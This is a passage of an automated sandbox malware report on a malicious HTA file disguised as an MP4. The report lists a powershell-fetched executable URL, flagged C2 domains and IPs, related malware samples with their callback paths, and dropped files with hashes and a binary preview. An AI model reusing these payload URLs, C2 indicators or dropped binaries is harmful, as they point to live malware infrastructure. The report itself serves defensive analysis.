                          https://ipapi.co/xml2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drfalse
                            high
                            https://github.com/rsms/inter)InterBold3.019;RSMS;Inter-BoldInter2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drfalse
                              high
                              http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLOpen2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://bigadcompany.com/Assaac.exeebKit/537.36powershell.exe, 00000013.00000002.3694595921.0000000002F9A000.00000004.00000010.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://foo/bar/picture/img_cake.png2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://foo/bar/picture/pic_tiz.ico2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://foo/Picture/pic_tiz.ico2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.3710439009.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1324265227.0000000005354000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1313179671.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://bigadcompany.com/Assaac.exe4cpowershell.exe, 00000013.00000002.3702752093.0000000003577000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://contoso.com/powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.3766668638.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1316974916.000000000567E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://foo/bar/app.baml2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://bigadcompany.com/t_powershell.exe, 00000013.00000002.3705156170.00000000057F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.3710439009.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1324265227.0000000005374000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1313179671.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000004AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://defaultcontainer/Assaac;component/Picture/pic_good.png2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A58514000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://defaultcontainer/Assaac;component/Picture/img_cake.png2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.3766668638.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1316974916.000000000567E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://bigadcompany.com/powershell.exe, 00000013.00000002.3705156170.00000000057F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://defaultcontainer/Assaac;component/MainWindow.xaml2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://defaultcontainer/Assaac;component/Picture/pic_tiz.ico2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://aka.ms/pscore6LRpowershell.exe, 0000000A.00000002.1324265227.0000000005346000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.mpowershell.exe, 0000000C.00000002.1318983067.0000000006E41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://foo/bar/mainwindow.baml2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://web.klipdywoziy.shoppowershell.exe, 0000000D.00000002.2173513151.0000000004C27000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://foo/MainWindow.xaml2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://foo/app.xaml2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://bigadcompany.com/L_powershell.exe, 00000013.00000002.3705156170.00000000057F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.microsoftJn9powershell.exe, 00000007.00000002.3776275081.0000000006DFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://foo/Picture/img_cake.png2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.21.112.1
                                                    quinceisoz.camUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    192.250.235.30
                                                    bigadcompany.comUnited States
                                                    36454CNSV-LLCUSfalse
                                                    188.114.97.3
                                                    web.klipdywoziy.shopEuropean Union
                                                    13335CLOUDFLARENETUStrue
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1585911
                                                    Start date and time:2025-01-08 13:54:06 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 51s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:23
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:web55.mp4.hta
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winHTA@18/12@3/3
                                                    EGA Information:
                                                    • Successful, ratio: 28.6%
                                                    HCA Information:
                                                    • Successful, ratio: 92%
                                                    • Number of executed functions: 168
                                                    • Number of non-executed functions: 66
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .hta
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 52.149.20.212
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, PID 6680 because it is empty
                                                    • Execution Graph export aborted for target mshta.exe, PID 6976 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 7324 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 7604 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    TimeTypeDescription
                                                    07:55:04API Interceptor129x Sleep call for process: powershell.exe modified
                                                    09:49:53API Interceptor11255x Sleep call for process: mshta.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                    • beammp.com/phpmyadmin/
                                                    188.114.97.3GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                    • /api/get/dll
                                                    DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                    • www.uzshou.world/ricr/
                                                    Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                    • www.cifasnc.info/8rr3/
                                                    Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                    Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                    • www.cifasnc.info/8rr3/
                                                    dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                    • /api/get/free
                                                    dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                    • /api/get/free
                                                    RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                    • www.rgenerousrs.store/o362/
                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                    • www.beylikduzu616161.xyz/2nga/
                                                    Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                    • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CNSV-LLCUShttps://www.google.co.uk/url?q=2RUDu&rct=2RUDu&sa=t&esrc=2RUDu&source=&cd=2RUDu&uact=&url=amp%2F%63%6F%64%65%76%69%72%6F%2E%63%6F%6D%2F%2E%6A%61%2F#zFqKgE-SUREJACKdm1hbnRocmlwcmFnYWRhQG1vbnRyb3NlLWVudi5jb20=Get hashmaliciousUnknownBrowse
                                                    • 192.250.231.230
                                                    z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 192.250.231.25
                                                    Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 192.250.231.25
                                                    z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 192.250.231.25
                                                    F#U0130YAT TEKL#U0130F#U0130-2400.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 192.250.227.28
                                                    https://sesworld.com.au:443/it/mount/Get hashmaliciousUnknownBrowse
                                                    • 192.250.235.25
                                                    https://hmchive.com/?hcv=bGFldGl0aWEucGF0cnktYmFsYXRAc3VlZHp1Y2tlcmdyb3VwLmNvbS0tLS1DYXJsb3MgR2FpdMOhbg==Get hashmaliciousUnknownBrowse
                                                    • 192.250.227.21
                                                    z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                    • 192.250.231.28
                                                    https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                    • 192.250.227.23
                                                    https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                    • 192.250.227.23
                                                    CLOUDFLARENETUSRgr8LJz.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.4.114
                                                    06012025_1416_bombastic.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                    • 172.64.41.3
                                                    malw.htaGet hashmaliciousUnknownBrowse
                                                    • 162.159.61.3
                                                    PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 172.67.131.144
                                                    http://www.hillviewlodge.hotelrent.topGet hashmaliciousUnknownBrowse
                                                    • 104.18.86.42
                                                    proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 188.114.97.3
                                                    random.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3
                                                    Q1 Statements.htmlGet hashmaliciousUnknownBrowse
                                                    • 104.18.95.41
                                                    CLOUDFLARENETUSRgr8LJz.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.4.114
                                                    06012025_1416_bombastic.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                    • 172.64.41.3
                                                    malw.htaGet hashmaliciousUnknownBrowse
                                                    • 162.159.61.3
                                                    PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 172.67.131.144
                                                    http://www.hillviewlodge.hotelrent.topGet hashmaliciousUnknownBrowse
                                                    • 104.18.86.42
                                                    proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 188.114.96.3
                                                    fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                    • 188.114.97.3
                                                    random.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3
                                                    Q1 Statements.htmlGet hashmaliciousUnknownBrowse
                                                    • 104.18.95.41
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eatomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                    • 188.114.97.3
                                                    QUOTATION - RFQ2496_PO 08775622879.pdf(87kb).com.exeGet hashmaliciousQuasarBrowse
                                                    • 188.114.97.3
                                                    proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 188.114.97.3
                                                    174.exeGet hashmaliciousXmrigBrowse
                                                    • 188.114.97.3
                                                    spreadmalware.exeGet hashmaliciousXWormBrowse
                                                    • 188.114.97.3
                                                    invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                    • 188.114.97.3
                                                    invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                    • 188.114.97.3
                                                    0a0#U00a0.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                    • 188.114.97.3
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 188.114.97.3
                                                    http://xyft.zmdusdxj.ruGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    a0e9f5d64349fb13191bc781f81f42e1Rgr8LJz.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    random.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    asd.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.112.1
                                                    • 192.250.235.30
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):8003
                                                    Entropy (8bit):4.840877972214509
                                                    Encrypted:false
                                                    SSDEEP:192:Dxoe5HVsm5emda2Ca6pZlbjvwRjdHPRhHgkjDt4iWN3yBGHVQ9smzdcU6CDQpOFP:J5opbjvwRjdvRCkjh4iUx5Uib4J
                                                    MD5:C7C7584B53C7E1685BD19C0CAEBB4C44
                                                    SHA1:4F9D95010E36559C4F2D15E0E9C20349A65783A6
                                                    SHA-256:F5DBB7A566A3BD3A84DB8FC60784E768CC6753BACD192C6CD71098F1C0B4B01E
                                                    SHA-512:281C50EBE3BAB2836D1C06B7DE27E320F8D43A11956165D40007BBFF3B6D78A3AC6094E6A7AB762F627E308C9A4E40139B8D0A347669C5D32B5AB3AA4EDEA9D7
                                                    Malicious:false
                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.773832331134527
                                                    Encrypted:false
                                                    SSDEEP:3:NlllulNll:NllU
                                                    MD5:75C059F0C6543681C4ACFE36E7E99F37
                                                    SHA1:79EE76A6673DEB72E024542E6F1682CE70643A0C
                                                    SHA-256:0268CAE1D808221A37116A6E7C4B4C0AE945A0243AA0B466C680FBD27B14FAA4
                                                    SHA-512:BE0A19696CDDA35684C2C60B8E5862224BC044932A43D800ACF32E7D22695A1290B97ED68BBAEC2FAAAAD9CAC04C718C541AF9A8291BDB3331F4EDC30875B21D
                                                    Malicious:false
                                                    Preview:@...e...................................".......................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:modified
                                                    Size (bytes):598528
                                                    Entropy (8bit):6.812874091267208
                                                    Encrypted:false
                                                    SSDEEP:6144:FBEILp+5kVNLTnJ2CW9BpW2RW1JaZWRRnQzSOShqfg7GsICYBbB8Kav66Ze:FBzayBTnq9BpxPZW3nQzSOSo8kTYvve
                                                    MD5:89470385FDDACB118DEB7A7941E6A666
                                                    SHA1:1D7A5E3A9880732C81932ADBF5C1D7026ACACBEB
                                                    SHA-256:B7ED6B15FC738C85BB85AD06C07F9A12C68D7C214E55F9514DFBC27895E0DCFA
                                                    SHA-512:0CA6C4C724C3DBEE66DA7D0E216C2C77A2EC5FB5198488F0FE60B0551CB9DF7C59053F125C9739313B8F75339E11DEC76114893A840A8E31624D20FDA141718F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...t.)..........."...0.................. .....@..... .......................`............`...@......@............... ............................... ..T,..........................h...8............................................................ ..H............text........ ...................... ..`.rsrc...T,... ......................@..@........................................H.......l...\.......'....y...............................................0..8........(!....(.....s"...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...%.{....o#...}....*.0..:........t......o$.....).o%...tU.....o&...u......,...o'.....o(...*"..o)...*..0..........
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
